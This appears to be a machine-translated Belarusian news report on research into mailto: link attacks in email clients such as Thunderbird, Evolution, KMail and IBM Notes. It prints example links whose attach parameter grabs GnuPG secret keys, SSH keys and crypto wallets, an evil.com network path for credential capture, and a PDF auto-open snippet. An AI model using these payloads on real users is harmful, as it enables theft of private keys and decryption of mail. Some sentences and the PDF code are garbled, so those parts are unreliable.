Даследчыкі з Рурскага ўніверсітэта ў Бохуме (Германія) () паводзіны паштовых кліентаў пры апрацоўцы спасылак "mailto:" з пашыранымі параметрамі. Пяць з дваццаці разгледжаных паштовых кліентаў апынуліся ўразлівыя для нападу, якая маніпулюе падстаноўкай рэсурсаў пры дапамозе параметра «attach». Яшчэ шэсць паштовых кліентаў былі схільныя нападу па замене ключоў PGP і S/MIME, а тры кліента апынуліся ўразлівыя для нападу па выманні змесціва зашыфраваных паведамленняў.
Спасылкі «» ужываюцца для аўтаматызацыі адкрыцця паштовага кліента з мэтай напісання ліста зададзенаму ў спасылцы адрасату. Акрамя адрасу ў складзе спасылкі можна пазначыць дадатковыя параметры, такія як тэма ліста і шаблон тыпавога змесціва. Прапанаваная атака маніпулюе параметрам «attach», які дазваляе прымацаваць да ствараемага ліста ўкладанне.
Паштовыя кліенты Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) і Pegasus Mail апынуліся ўразлівыя трывіяльнаму нападу, якая дазваляе аўтаматычна пазначаны праз спасылку віду «mailto:?attach=шлях_да_файла». Файл прымацоўваецца без вываду папярэджання, таму без спецыяльнага акцэнтавання ўвагі карыстальнік можа не заўважыць, што ліст будзе адпраўлены з прымацаваннем укладаннем.
Напрыклад, пры дапамозе спасылкі віду «mailto:[электронная пошта абаронена]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg» можна падставіць у ліст зачыненыя ключы ад GnuPG. Таксама можна адправіць змесціва криптокошельков (~/.bitcoin/wallet.dat), SSH-ключы (~/.ssh/id_rsa) і любыя даступныя карыстачу файлы. Больш таго, Thunderbird дазваляе прымацоўваць групы файлаў па масцы пры дапамозе канструкцый выгляду "attach=/tmp/*.txt".
Акрамя лакальных файлаў некаторыя паштовыя кліенты апрацоўваюць спасылкі на сеткавыя сховішчы і шляхі ў IMAP-серверы. У прыватнасці, IBM Notes дазваляе перадаць файл з сеткавага каталога пры апрацоўцы спасылак выгляду «attach=evil.comdummyfile», а таксама перахапіць параметры аўтэнтыфікацыі NTLM накіраваўшы спасылку на SMB-сервер, падкантрольны атакаваламу (запыт будзе адпраўлены з бягучымі параметрамі аўтэнтыфікацыі карыстальніка).
Thunderbird паспяхова апрацоўвае запыты выгляду "attach=imap:///fetch>UID>/INBOX>1/", якія дазваляюць прымацаваць змесціва з тэчак на IMAP-серверы. Пры гэтым вымаемыя з IMAP ліста, зашыфраваныя праз OpenPGP і S/MIME, аўтаматычна расшыфроўваюцца паштовым кліентам перад адпраўкай. Распрацоўнікі Thunderbird былі аб праблеме ў лютым і ў выпуску праблема ўжо ўхіленая (галінкі Thunderbird 52, 60 і 68 застаюцца ўразлівымі).
Старыя версіі Thunderbird апынуліся ўразлівыя і для двух іншых варыянтаў нападу на PGP і S/MIME, прапанаваных даследнікамі. У прыватнасці, да Thunderbird, а таксама да OutLook, PostBox, eM Client, MailMate і R2Mail2 аказалася дастасавальная атака па замене ключоў, выкліканая тым, што паштовы кліент аўтаматычна імпартуе і ўсталёўвае новыя сертыфікаты, якія перадаюцца ў паведамленнях S/MIME, што дазваляе атакаваламу арганізаваць. падмену ўжо захаваных у карыстальніка адкрытых ключоў.
Другая атака, якой схільныя Thunderbird, PostBox і MailMate, маніпулюе асаблівасцямі механізму аўтазахавання чарнавікоў паведамленняў і дазваляе пры дапамозе параметраў mailto ініцыяваць расшыфроўку зашыфраваных паведамленняў або даданне лічбавага подпісу для адвольных паведамленняў, з наступнай перадачай выніку на IM. Шыфратэкст пры дадзеным нападзе перадаецца праз парметр «body», а для ініцыявання звароту да IMAP-серверу атакавалага ўжываецца тэг «meta refresh». Напрыклад: ' '
Для аўтаматычнай апрацоўкі спасылак "mailto:" без удзелу карыстальніка могуць прымяняцца спецыяльна аформленыя дакументы PDF - дзеянне OpenAction у PDF дазваляе аўтаматычна запусціць апрацоўшчык mailto пры адкрыцці дакумента:
%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
эндоб
2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
эндоб
Крыніца: opennet.ru